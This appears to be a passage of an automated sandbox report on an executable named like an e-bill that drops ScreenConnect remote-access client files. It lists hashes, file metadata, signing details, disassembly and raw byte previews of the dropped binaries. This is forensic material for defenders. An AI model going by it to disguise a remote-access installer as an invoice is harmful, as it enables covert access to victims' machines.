                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1721856
                                                                                                                                                Entropy (8bit):6.639136400085158
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1982
                                                                                                                                                Entropy (8bit):5.057585371364542
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):61216
                                                                                                                                                Entropy (8bit):6.31175789874945
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):266
                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):601376
                                                                                                                                                Entropy (8bit):6.185921191564225
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):266
                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2573
                                                                                                                                                Entropy (8bit):5.026361555169168
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):17866
                                                                                                                                                Entropy (8bit):5.954687824833028
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):81696
                                                                                                                                                Entropy (8bit):5.862223562830496
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):266
                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):87
                                                                                                                                                Entropy (8bit):3.463057265798253
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):55
                                                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1121
                                                                                                                                                Entropy (8bit):5.342215969645725
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:ML9E4KiE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzetJE4G1qE4j:MxHKiHKnYHKh3oPtHo6hAHKzetJHG1qD
                                                                                                                                                MD5:4F13BE23AEC301E86C0DE5CB433E8C51
                                                                                                                                                SHA1:1E2D836615D5F58BE6F783DE3419B72145C67328
                                                                                                                                                SHA-256:B04CE5777D696BE968DED9C867B6DF301E29727D2C7339F264A6A732E78B2EA4
                                                                                                                                                SHA-512:C7C9E26407235F2D2165D359407147592BC088BC188AF26548C78D308FEDF6D73A5A383ED88249092A454DBB85C4CEE6050D4874A3B4B927C379980B7F719467
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, Publ
                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Entropy (8bit):6.514741307956859
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                File name:E_BILL0041272508.exe
                                                                                                                                                File size:83'352 bytes
                                                                                                                                                MD5:9ffc98a16aba4841e94b24ccabf219ab
                                                                                                                                                SHA1:31925b39e3255446a3b0803da2f75337329f6a65
                                                                                                                                                SHA256:453e8d5897ce07b29bc8df2312686cca8d2df37bcf43b1e7e0d5c8b0ee585a3f
                                                                                                                                                SHA512:390da771544bc23fd3b00db6dbd78b9b9d2846380cc162af759372e28da3b5ed8c01e380ed538cbe4fdc68269b5e98915e439db85e86792c0ad8a078f5de1484
                                                                                                                                                SSDEEP:1536:BoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYH7IxD:7enkyfPAwiMq0RqRfbaxZJYYH
                                                                                                                                                TLSH:85835B43B5D18875E9720E3118B1D9B4593FBD110EA48EAF3398426E0F351D19E3AE7B
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..
                                                                                                                                                Icon Hash:00928e8e8686b000
                                                                                                                                                Entrypoint:0x401489
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:true
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                Time Stamp:0x66BBDDB2 [Tue Aug 13 22:26:58 2024 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:5
                                                                                                                                                OS Version Minor:1
                                                                                                                                                File Version Major:5
                                                                                                                                                File Version Minor:1
                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                Subsystem Version Minor:1
                                                                                                                                                Import Hash:37d5c89163970dd3cc69230538a1b72b
                                                                                                                                                Signature Valid:true
                                                                                                                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                Signature Validation Error:The operation completed successfully
                                                                                                                                                Error Number:0
                                                                                                                                                Not Before, Not After
                                                                                                                                                • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                                                                                                                Subject Chain
                                                                                                                                                • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                Version:3
                                                                                                                                                Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                                                                                Instruction
                                                                                                                                                call 00007FA051059CDAh
                                                                                                                                                jmp 00007FA05105978Fh
                                                                                                                                                push ebp
                                                                                                                                                mov ebp, esp
                                                                                                                                                push 00000000h
                                                                                                                                                call dword ptr [0040B048h]
                                                                                                                                                push dword ptr [ebp+08h]
                                                                                                                                                call dword ptr [0040B044h]
                                                                                                                                                push C0000409h
                                                                                                                                                call dword ptr [0040B04Ch]
                                                                                                                                                push eax
                                                                                                                                                call dword ptr [0040B050h]
                                                                                                                                                pop ebp
                                                                                                                                                ret
                                                                                                                                                push ebp
                                                                                                                                                mov ebp, esp
                                                                                                                                                sub esp, 00000324h
                                                                                                                                                push 00000017h
                                                                                                                                                call dword ptr [0040B054h]
                                                                                                                                                test eax, eax
                                                                                                                                                je 00007FA051059917h
                                                                                                                                                push 00000002h
                                                                                                                                                pop ecx
                                                                                                                                                int 29h
                                                                                                                                                mov dword ptr [004118C0h], eax
                                                                                                                                                mov dword ptr [004118BCh], ecx
                                                                                                                                                mov dword ptr [004118B8h], edx
                                                                                                                                                mov dword ptr [004118B4h], ebx
                                                                                                                                                mov dword ptr [004118B0h], esi
                                                                                                                                                mov dword ptr [004118ACh], edi
                                                                                                                                                mov word ptr [004118D8h], ss
                                                                                                                                                mov word ptr [004118CCh], cs
                                                                                                                                                mov word ptr [004118A8h], ds
                                                                                                                                                mov word ptr [004118A4h], es
                                                                                                                                                mov word ptr [004118A0h], fs
                                                                                                                                                mov word ptr [0041189Ch], gs
                                                                                                                                                pushfd
                                                                                                                                                pop dword ptr [004118D0h]
                                                                                                                                                mov eax, dword ptr [ebp+00h]
                                                                                                                                                mov dword ptr [004118C4h], eax
                                                                                                                                                mov eax, dword ptr [ebp+04h]
                                                                                                                                                mov dword ptr [004118C8h], eax
                                                                                                                                                lea eax, dword ptr [ebp+08h]
                                                                                                                                                mov dword ptr [004118D4h], eax
                                                                                                                                                mov eax, dword ptr [ebp-00000324h]
                                                                                                                                                mov dword ptr [00411810h], 00010001h
                                                                                                                                                Programming Language:
                                                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1060c0x3c.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x130000x1e0.rsrc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x118000x2d98
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x140000xddc.reloc
